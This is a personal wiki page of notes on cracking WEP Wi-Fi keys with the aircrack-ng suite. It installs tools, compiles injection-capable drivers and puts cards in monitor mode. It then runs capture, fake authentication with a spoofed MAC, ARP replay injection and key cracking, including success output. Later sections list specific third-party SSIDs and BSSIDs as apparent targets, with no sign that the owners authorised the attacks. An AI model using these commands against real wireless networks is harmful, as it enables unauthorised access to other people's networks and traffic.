Aircrack

From Halfface
Revision as of 06:48, 12 December 2007 by 192.168.2.8 (talk)
Jump to navigation Jump to search

Install aircrack-ng

yum -y install aircrack-ng

For compiling injection drivers.

yum -y install kernel-headers

Optionally install kismet.

yum -y install kismet

compile injection enabled drivers

rt73

wget http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt73-k2wrlz-2.0.1.tar.bz2
tar -xjf rt73-k2wrlz-2.0.1.tar.bz2
cd rt73-k2wrlz-2.0.1/Module
make
make install
modprobe rt73

rt61

wget http://rt2x00.serialmonkey.com/rt61-cvs-daily.tar.gz
tar xvfz rt61-cvs-daily.tar.gz
cd rt61-cvs-*
cd Module
make
make install

madwifi-ng

svn -r 2834 checkout http://svn.madwifi.org/madwifi/trunk/ madwifi-ng2834
wget http://patches.aircrack-ng.org/madwifi-ng-r2277.patch
cd madwifi-ng2834
patch -Np1 -i ../madwifi-ng-r2277.patch
./scripts/madwifi-unload
make
make install
depmod -ae
modprobe ath_pci

Tweak network driver

Enable monitor mode and injection.

  • ralink
ifconfig rausb0 up
iwconfig rausb0 mode monitor
iwpriv rausb0 rfmontx 1

Change speed on network card.

iwconfig rausb0 rate 1M
  • atheros
ifconfig ath0 down
wlanconfig ath0 destroy
wlanconfig ath create wlandev wifi0 wlanmode monitor [sta|adhoc|ap|monitor|wds|ahdemo]

Crack wep key

Start kismet and capture the following data.

Name    : default
ESSID   : default
BSSID   : 00:13:46:4B:37:DE
Channel : 6
clientmac: 00:16:CE:4C:B7:53

Edit this file to make kismet start.

  • /etc/kismet/kismet.conf
source=iwl4965,wlan0,addme
source=rt73,wlan1,wlan1
source=rt73,rausb0,rausb0
source=rt2500,rausb0,RT73

Write comunication from ap.

airodump-ng --write wifi-network1 --channel 11 --bssid 00:90:4C:7E:00:6E rausb0

Assosiate with access point.

aireplay-ng -1 0 -e MASO -a 00:90:4C:7E:00:6E -h 00:1B:11:BC:D5:1B rausb0
07:46:14  Waiting for beacon frame (BSSID: 00:90:4C:7E:00:6E)
07:46:14  Sending Authentication Request
07:46:14  Authentication successful
07:46:14  Sending Association Request
07:46:14  Association successful :-)

Generate network comunication.

aireplay-ng --arpreplay -b 00:90:4C:7E:00:6E -h 00:1B:11:BC:D5:1B rausb0

Crack web key.

aircrack-ng -z -b 00:90:4C:7E:00:6E wifi-network1*.cap

Information

netgear DWL-G122 
mac:	00:1B:11:BC:D5:1B
Name    : B2_private_49
SSID    : B2_private_49
BSSID   : 00:01:38:9A:91:EC
Channel : 11
Name    : vgrox
SSID    : vgrox
BSSID   : 00:13:46:E1:2F:4F
Channel : 9
client:	00:13:46:E1:2F:4F
airodump-ng --ivs --write dump2 --channel 9 --bssid 00:13:46:E1:2F:4F rausb0
ifconfig rausb0 up
iwconfig rausb0 mode monitor
iwpriv rausb0 rfmontx 1


ongoing

airmon-ng stop ath0
airmon-ng start wifi0 6
capture iv:s. 
airodump-ng -c 6 --bssid 00:13:46:4B:37:DE -w airdump-ng-defaul ath0
fake authentication -e name -a -a access point MAC address -h 
aireplay-ng -1 0 -e default -a 00:14:6C:7E:40:80 -h 00:40:96:a6:ca:1c ath0
aireplay-ng -1 0 -e default -a 00:13:46:4B:37:DE -h 06:40:96:A6:CA:1C ath0
aireplay-ng -3 -b 00:13:46:4B:37:DE -h 00:16:CE:4C:B7:53 ath0